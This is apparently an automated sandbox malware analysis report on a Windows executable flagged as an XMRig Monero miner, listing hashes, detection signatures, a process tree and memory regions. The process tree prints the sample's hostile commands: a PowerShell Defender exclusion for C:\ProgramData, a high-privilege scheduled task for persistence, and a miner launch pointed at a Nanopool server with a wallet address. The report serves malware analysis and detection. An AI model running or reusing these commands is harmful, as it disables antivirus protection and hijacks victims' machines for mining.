Analysis

  • max time kernel
    135s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/03/2023, 05:47

General

  • Target

    e7a3b43d8953d8995090f36601176f32.exe

  • Size

    1.6MB

  • MD5

    e7a3b43d8953d8995090f36601176f32

  • SHA1

    2aa625e0ca6c00dfebba891aabf6f364519fd26a

  • SHA256

    bca634a2ce6764abb8f7ee5eb594275ae7a919f78fc09ab9937a6196d4b00c56

  • SHA512

    854ec2ca157b640f1561665f5734c10591cee8d61a73a5f6ddb11d04b2eee0bee3a6265bc8f2e54fcbfba892b10d474e76ba0c4edb421ff1185e8f3e635f964f

  • SSDEEP

    24576:TXgUpD815hokdlnI2cVDwf4Bk2I3LbewNSdP4J8q0otqt1px0fZpphBBHIWj:a1ZvCm462I3HbIdQJ86qJepR7

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e7a3b43d8953d8995090f36601176f32.exe
    "C:\Users\Admin\AppData\Local\Temp\e7a3b43d8953d8995090f36601176f32.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2476
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3484
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4296
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1672

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5yq4h2r.zzb.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/620-134-0x0000000003830000-0x0000000003871000-memory.dmp

          Filesize

          260KB

        • memory/620-138-0x00007FFFDA300000-0x00007FFFDA3AA000-memory.dmp

          Filesize

          680KB

        • memory/620-139-0x00007FFFF7060000-0x00007FFFF70FE000-memory.dmp

          Filesize

          632KB

        • memory/620-140-0x0000000000E10000-0x0000000000FA0000-memory.dmp

          Filesize

          1.6MB

        • memory/620-141-0x0000000003830000-0x0000000003871000-memory.dmp

          Filesize

          260KB

        • memory/620-142-0x00007FFFF39D0000-0x00007FFFF39E2000-memory.dmp

          Filesize

          72KB

        • memory/620-143-0x00007FFFD9FE0000-0x00007FFFDA09D000-memory.dmp

          Filesize

          756KB

        • memory/620-144-0x00007FFFF7F20000-0x00007FFFF80C1000-memory.dmp

          Filesize

          1.6MB

        • memory/620-145-0x00007FFFD8F20000-0x00007FFFD99E1000-memory.dmp

          Filesize

          10.8MB

        • memory/620-146-0x00007FFFF7030000-0x00007FFFF705B000-memory.dmp

          Filesize

          172KB

        • memory/620-147-0x0000000000E10000-0x0000000000FA0000-memory.dmp

          Filesize

          1.6MB

        • memory/620-148-0x00007FFFD8DD0000-0x00007FFFD8F1E000-memory.dmp

          Filesize

          1.3MB

        • memory/620-149-0x00007FFFF63B0000-0x00007FFFF63D7000-memory.dmp

          Filesize

          156KB

        • memory/620-150-0x000000001CC20000-0x000000001CC30000-memory.dmp

          Filesize

          64KB

        • memory/620-166-0x00007FFFF8390000-0x00007FFFF8585000-memory.dmp

          Filesize

          2.0MB

        • memory/620-167-0x00007FFFF6740000-0x00007FFFF67FE000-memory.dmp

          Filesize

          760KB

        • memory/620-168-0x00007FFFF5C60000-0x00007FFFF5F29000-memory.dmp

          Filesize

          2.8MB

        • memory/620-169-0x00007FFFF6310000-0x00007FFFF63AD000-memory.dmp

          Filesize

          628KB

        • memory/620-170-0x00007FFFF5F30000-0x00007FFFF6030000-memory.dmp

          Filesize

          1024KB

        • memory/620-173-0x00007FFFF7D00000-0x00007FFFF7DAC000-memory.dmp

          Filesize

          688KB

        • memory/620-175-0x00007FFFF6600000-0x00007FFFF672A000-memory.dmp

          Filesize

          1.2MB

        • memory/620-174-0x00007FFFF7060000-0x00007FFFF70FE000-memory.dmp

          Filesize

          632KB

        • memory/620-176-0x00007FFFDA580000-0x00007FFFDA5E5000-memory.dmp

          Filesize

          404KB

        • memory/620-177-0x00007FFFF7240000-0x00007FFFF7595000-memory.dmp

          Filesize

          3.3MB

        • memory/620-178-0x00007FFFF6F60000-0x00007FFFF702D000-memory.dmp

          Filesize

          820KB

        • memory/620-180-0x00007FFFF6570000-0x00007FFFF65C5000-memory.dmp

          Filesize

          340KB

        • memory/620-179-0x00007FFFDA300000-0x00007FFFDA3AA000-memory.dmp

          Filesize

          680KB

        • memory/620-182-0x00007FFFE8D20000-0x00007FFFE8D2A000-memory.dmp

          Filesize

          40KB

        • memory/620-184-0x00007FFFEEAD0000-0x00007FFFEEAE6000-memory.dmp

          Filesize

          88KB

        • memory/620-183-0x00007FFFD8F20000-0x00007FFFD99E1000-memory.dmp

          Filesize

          10.8MB

        • memory/620-186-0x00007FFFF6800000-0x00007FFFF692A000-memory.dmp

          Filesize

          1.2MB

        • memory/620-185-0x00007FFFD9FE0000-0x00007FFFDA09D000-memory.dmp

          Filesize

          756KB

        • memory/620-187-0x00007FFFD8DD0000-0x00007FFFD8F1E000-memory.dmp

          Filesize

          1.3MB

        • memory/620-188-0x00007FFFF63B0000-0x00007FFFF63D7000-memory.dmp

          Filesize

          156KB

        • memory/620-189-0x0000000000E10000-0x0000000000FA0000-memory.dmp

          Filesize

          1.6MB

        • memory/620-190-0x000000001CC20000-0x000000001CC30000-memory.dmp

          Filesize

          64KB

        • memory/620-218-0x00007FFFD9E00000-0x00007FFFD9E35000-memory.dmp

          Filesize

          212KB

        • memory/620-219-0x00007FFFD4350000-0x00007FFFD4452000-memory.dmp

          Filesize

          1.0MB

        • memory/620-220-0x00007FFFF7E50000-0x00007FFFF7EBB000-memory.dmp

          Filesize

          428KB

        • memory/620-221-0x00007FFFF4E80000-0x00007FFFF4EBB000-memory.dmp

          Filesize

          236KB

        • memory/620-223-0x00007FFFF8390000-0x00007FFFF8585000-memory.dmp

          Filesize

          2.0MB

        • memory/620-370-0x0000000000E10000-0x0000000000FA0000-memory.dmp

          Filesize

          1.6MB

        • memory/1672-261-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1672-268-0x00000264009C0000-0x0000026400A00000-memory.dmp

          Filesize

          256KB

        • memory/1672-300-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1672-363-0x000002636E960000-0x000002636E980000-memory.dmp

          Filesize

          128KB

        • memory/1672-365-0x0000026401030000-0x0000026401050000-memory.dmp

          Filesize

          128KB

        • memory/1672-372-0x0000026401030000-0x0000026401050000-memory.dmp

          Filesize

          128KB

        • memory/1672-371-0x000002636E960000-0x000002636E980000-memory.dmp

          Filesize

          128KB

        • memory/2476-158-0x00000237FFC10000-0x00000237FFC32000-memory.dmp

          Filesize

          136KB